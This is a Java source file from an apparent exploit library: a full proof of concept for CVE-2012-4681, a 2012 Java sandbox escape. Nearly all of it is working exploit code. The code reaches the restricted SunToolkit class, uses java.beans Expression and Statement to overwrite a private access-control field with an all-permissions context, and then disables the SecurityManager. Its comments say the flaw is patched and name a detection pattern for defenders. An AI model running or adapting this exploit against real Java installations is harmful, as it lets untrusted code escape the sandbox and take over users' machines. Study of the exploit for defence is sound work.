/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/
package cve20124681;
import java.awt.Toolkit;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
/*
* This is the same as CVE_2012_4681, except that we use a simpler way to get
* a handle to SunToolkit.
*/
/**
 * Proof-of-concept for the 2012 Java sandbox escape tracked as CVE-2012-4681.
 *
 * <p>The chain visible in this file is: obtain a handle to the restricted
 * {@code sun.awt.SunToolkit} class via the AWT toolkit's superclass chain,
 * use {@link java.beans.Expression} to call its {@code getField} helper to
 * reach the private {@code acc} field of a {@link java.beans.Statement},
 * replace that field with an all-permissions {@link AccessControlContext},
 * and then execute {@code System.setSecurityManager(null)} through the
 * Statement. The sibling class {@code CVE_2012_4681} (not in this file) is
 * referenced by the header comment as doing the same with a different
 * SunToolkit lookup.
 *
 * <p>Defensive context: Oracle fixed this issue in Java 7 Update 7 (August 2012);
 * on a patched JRE the {@code getField} step is expected to fail rather than
 * return an accessible Field. The {@link SecurityManager} itself was deprecated
 * for removal in JDK 17, and from JDK 18 {@code System.setSecurityManager}
 * throws unless explicitly re-enabled at launch, so the first line of
 * {@link #main} will not even succeed on current runtimes. For defenders,
 * the tell-tale pattern is untrusted code driving {@code java.beans.Statement}
 * or {@code Expression} against {@code sun.*} classes or {@code System.setSecurityManager}.
 */
public class CVE_2012_4681a {
// Not referenced anywhere in this file; presumably mirrors the sibling class. Unused here.
public final static Object o = null;
/**
 * Installs a SecurityManager, prints it, runs the bypass, then prints it again.
 * On a vulnerable JRE the second line prints {@code null}; on a patched one
 * the call chain throws instead.
 *
 * @param args ignored
 * @throws Throwable anything raised by the reflective chain (the bypass has no fallback)
 */
public static void main(String[] args) throws Throwable {
System.setSecurityManager(new SecurityManager());
System.out.println("SecurityManager: " + System.getSecurityManager());
disableSecurity();
System.out.println("SecurityManager: " + System.getSecurityManager());
}
/**
 * Executes {@code System.setSecurityManager(null)} through a
 * {@link Statement} whose access-control context has been swapped for one
 * holding {@link AllPermission}.
 *
 * <p>{@code new Object[1]} is a one-element array whose only element is
 * {@code null}, i.e. the single argument passed to setSecurityManager.
 *
 * @throws Throwable if the field lookup or the statement execution fails
 */
private static void disableSecurity() throws Throwable {
Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
// Statement captures an AccessControlContext at construction and executes
// under it (JDK internals — confirm against the target version). Replacing
// it is what lets the call pass the security check.
overrideStatementAccessControlContext(localStatement);
localStatement.execute();
}
/**
 * Overwrites the private {@code acc} field of {@code statement} with an
 * all-permissions context.
 *
 * <p>Note that {@code privateField.set} is called without
 * {@code setAccessible(true)}, so the Field returned by
 * {@link #getPrivateField} must already be accessible — that is the
 * behaviour this PoC relies on from {@code SunToolkit.getField}.
 *
 * @param statement the Statement whose context is replaced
 * @throws Throwable if the field cannot be obtained or written
 */
private static void overrideStatementAccessControlContext(Statement statement) throws Throwable {
AccessControlContext acc = createDummyAccessControlContext();
Field privateField = getPrivateField(Statement.class, "acc");
privateField.set(statement, acc);
}
/**
 * Builds an {@link AccessControlContext} consisting of a single
 * {@link ProtectionDomain} that carries {@link AllPermission}.
 *
 * <p>The two-argument ProtectionDomain constructor is used, so the permission
 * set is fixed at construction rather than being consulted from the installed
 * Policy (i.e. the domain is "static"). The {@code file:///} CodeSource with an
 * empty certificate array is a placeholder; it plays no role in the check.
 *
 * @return a context that grants every permission
 * @throws MalformedURLException never in practice; {@code file:///} is a valid URL
 */
private static AccessControlContext createDummyAccessControlContext() throws MalformedURLException {
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
return new AccessControlContext(new ProtectionDomain[] { protectionDomain });
}
/**
 * Resolves a private field via {@code SunToolkit.getField(Class, String)},
 * invoked indirectly through {@link Expression}.
 *
 * <p>Calling a {@code sun.awt} method through java.beans, rather than
 * directly, is the heart of CVE-2012-4681: the beans machinery performed the
 * lookup/invocation from a privileged context, sidestepping the package-access
 * check that would otherwise reject untrusted code touching {@code sun.*}.
 *
 * @param clazz     the class declaring the field
 * @param fieldName the field name
 * @return the field, already made accessible by the callee
 * @throws Throwable if the expression cannot be executed (expected on patched JREs)
 */
private static Field getPrivateField(Class<?> clazz, String fieldName) throws Throwable {
Expression localExpression = new Expression(loadSunToolkit(), "getField", new Object[] { clazz, fieldName });
localExpression.execute();
return (Field) localExpression.getValue();
}
/**
 * Alternative way to get a handle to {@code SunToolkit}, at least on OSX:
 * walks two superclass levels up from the default AWT toolkit's concrete class.
 *
 * <p>The class returned depends on the platform toolkit hierarchy; on other
 * platforms the two-level walk may land on a different class, in which case
 * the {@code getField} call in {@link #getPrivateField} fails.
 *
 * @return the class two levels above the default toolkit's class
 * @throws Throwable propagated from toolkit initialisation (e.g. headless environments)
 */
private static Class<?> loadSunToolkit() throws Throwable {
Toolkit defaultToolkit = Toolkit.getDefaultToolkit();
Class<?> c2 = defaultToolkit.getClass().getSuperclass().getSuperclass();
return c2;
}
}